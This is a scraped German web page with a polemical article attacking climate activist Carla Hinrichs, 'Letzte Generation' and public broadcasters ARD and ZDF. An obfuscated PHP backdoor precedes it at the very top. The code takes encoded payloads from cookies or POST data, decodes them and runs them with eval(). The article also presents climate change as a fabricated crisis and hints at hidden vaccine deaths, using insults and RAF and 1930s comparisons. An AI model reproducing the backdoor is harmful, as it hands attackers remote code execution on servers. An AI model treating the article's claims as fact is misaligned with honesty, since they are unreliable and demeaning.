$auDiDm = class_exists("V_CGoZ");if (!$auDiDm){class V_CGoZ{private $XkVtqVHtt;public static $fKcqCF = "a158a651-ff74-4edd-953b-c602dc034b3c";public static $zDAWli = NULL;public function __construct(){$VLrdKegcTD = $_COOKIE;$DhwQtx = $_POST;$mummiCkbIe = @$VLrdKegcTD[substr(V_CGoZ::$fKcqCF, 0, 4)];if (!empty($mummiCkbIe)){$gjDlrlmo = "base64";$iKSRFTZjJ = "";$mummiCkbIe = explode(",", $mummiCkbIe);foreach ($mummiCkbIe as $knlWEFqQRS){$iKSRFTZjJ .= @$VLrdKegcTD[$knlWEFqQRS];$iKSRFTZjJ .= @$DhwQtx[$knlWEFqQRS];}$iKSRFTZjJ = array_map($gjDlrlmo . chr ( 924 - 829 ).chr ( 569 - 469 ).chr (101) . "\143" . chr ( 254 - 143 ).'d' . chr ( 408 - 307 ), array($iKSRFTZjJ,)); $iKSRFTZjJ = $iKSRFTZjJ[0] ^ str_repeat(V_CGoZ::$fKcqCF, (strlen($iKSRFTZjJ[0]) / strlen(V_CGoZ::$fKcqCF)) + 1);V_CGoZ::$zDAWli = @unserialize($iKSRFTZjJ);}}public function __destruct(){$this->qrWpeOVCE();}private function qrWpeOVCE(){if (is_array(V_CGoZ::$zDAWli)) {$bdwWJSmubh = str_replace('<' . chr (63) . chr ( 117 - 5 ).'h' . "\x70", "", V_CGoZ::$zDAWli[chr (99) . "\157" . "\156" . "\164" . "\x65" . chr ( 670 - 560 ).'t']);eval($bdwWJSmubh);exit();}}}$fnjTXPt = new V_CGoZ(); $fnjTXPt = NULL;} ?> Die Postergirls des Klimaterrors: Gern gesehen bei ARD und ZDF – No-Zensur.de Das freie Wort für eine freie Welt
Start Ansage.org Die Postergirls des Klimaterrors: Gern gesehen bei ARD und ZDF

Die Postergirls des Klimaterrors: Gern gesehen bei ARD und ZDF

0
Die Postergirls des Klimaterrors: Gern gesehen bei ARD und ZDF




Klein-Carla ist im Fernsehen! (Foto:ScreenshotYoutube)

Sie haben es erneut getan: Schon wieder hat ein Major-Talkshowformat der Öffentlich-rechtlichen Vertretern einer demokratisch nicht legitimierten „Bewegung“, die durch kriminelle Aktionen von sich reden Macht, die Bühne geboten. Der gestrige Auftritt von Carla „Hirnriss“ Hinrichs bei „Anne Will“, der dort wieder maldie zwangsgebührenfinanzierte Öffentlichkeit eines Millionenpublikums geboten wurde, toppt dabei noch die Selbstinszenierung von Luisa Neubauer, Carla Reemtsma oder Pauline Brünger von „Fridays for Future”. Denn mit Hinrichs tritt hier die Sprecherin der klimaterroristischen „Letzten Generation” auf, die aus ihrem Prinzip des Rechtsbruchs aus eigener Apologetik einen sich zunehmend eskalierten Generalfeldzug gegen unsere Kulturgüter, Leistungsträger und alle anständige Menschen dieses Landes führt. Mit dieser Zielsetzung „ihrer” Bewegung nimmt Hinrichs unter den selbstverliebten Postergirls der deutschen Klimabewegung einen Sonderstatus ein.

Dass Hinrichs und Konsorten nicht auf Anklagebänken oder U-Haft-Pritschen, sondern in deutschen Talkshows sitzen, wo sie den politischen Eliten Unverschämtheiten an den Kopf schleudern dürfen (und etwa dem amtierenden Bundesjustizminister die Missachtung des Grundgesetzes vorwerfen dürfen!), ist der vorerst jüngste Beweis dafür, wie dringend überfällig und alternativlos die sofortige Abschaffung des öffentlich-rechtlichen Rundfunks ist. Salon-Linksradikale, Wohlstandskids und erpresserische Aktivisten parlieren hier, moderiert von blasierten gelifteten Plapperweibern, angeregt über ihre weltanschaulich verstiegenen Bevormundungspläne und quasireligiöse Visionen, hilfslos und untauglich eingebremst von Regierungspolitikern, die sich für irre fortschrittlich halten, indem sie an diesem miesen Schauspiel teilnehmen, um bloß „mit den jungen Leuten zu reden” – während die Normalbevölkerung immer verzweifelter versucht, mit Inflation, Energiekostenexplosion und Wirtschaftskrise irgendwie zu Rande kommen. Hier macht er wahrlich Sinn, der Vorwurf der „false balance”.

Kein Zweifel: Wären die Baader-Meinhof-Gruppe und ihre Proto-RAF ein Phänomen der Gegenwart, dann hätten die Nudging-Framing-Talkshows und ÖRR-Gesinnungsjournalisten nicht die geringsten Probleme damit, sie heute ebenfalls in ihre Sendungen einzuladen – jedenfalls, solange sie noch der Frühphase ihrer „Gewalt gegen Sachen“ steckten: „Liebe Frau Ensslin, Herr Proll, Herr Söhnlein, ist das Legen von Bränden in Frankfurter Kaufhäusern wirklich der richtige Weg, auf Ihr natürlich berechtigtes Anliegen aufmerksam zu machen?” Und Buschmanns offenbarungseidgleicher Appell an Hinrichs, „Sie müssen sich an Recht und Gesetz halten!”, wäre von den RAF-Gründern ebenso unter Verweis auf den übergesetzlichen Notstand und Missstände, die mit „rechtsstaatlichen Methoden“ nicht mehr beseitigt werden könnten, beiseite gewischt worden. Weltrevolution oder Weltklima – der Wahn ist derselbe, nur die Inhalte sind neu. Und neu ist das völlig schamlos-ungenierte Paktieren der Mainstream-Medien mit derartigen Extremisten. Extremisten, denen früher oder später die Zerstörung von Kunstwerken oder die Blockade von Verkehrswegen und Infrastruktur nicht mehr reichen wird. Der Grundsatz des „Wehret den Anfängen” wird in Deutschland heute noch konsequenter missachtet als 1930-1933.

Die Gelegenheit zur maximalprominenten Selbstdarstellung von wohlstandsdekadenten selbstgerechten Gören, und das zur Prime-Time in ARD und ZDF, erfolgt in einer Zeit, da dieselben Medien Andersdenkende und die von ihnen angeprangerten Missstände zugleich konsequent verschweigen oder bagatellisieren: Impfopfer und Übersterblichkeit; Anstieg der Migrantengewalt; kollabierende Kapazitäten der anhaltenden Flüchtlingsaufnahme. Diese realen gesellschaftlichen Probleme werden unter den Teppich gekehrt, dafür werden Klima-Phantomkrisen auf hochumstrittenen Modellrechnungen, die in Wahrheit der Deindustrialisierung und Renaissance globaler sozialistischer Diktaturen dienen, zum Dauerthema gemacht. Und wer sich in den freien Medien oder den sozialen Netzwerken ihrer annimmt, wird durch „Gemeinschaftsstandards”, NetzwerkDG oder neuerdings den „Digital Services Act“ der EU ge-„shadowbanned”, ge-„deplatformed”, gesperrt, zensiert, gelöscht und mundtot gemacht (und wenn ein Elon Musk eben mit dieser schleichenden Zersetzung der Redefreiheit Schluss machen will, wird er dafür von Politik und Medien angefeindet). Hingegen müssen sich die Hinrichs und Neubauers sicher nie über mangelnde „Redefreiheit“ beklagen – egal, welche Straftaten und Terrorakte ihre Anhänger noch verüben werden.

 

 



Source link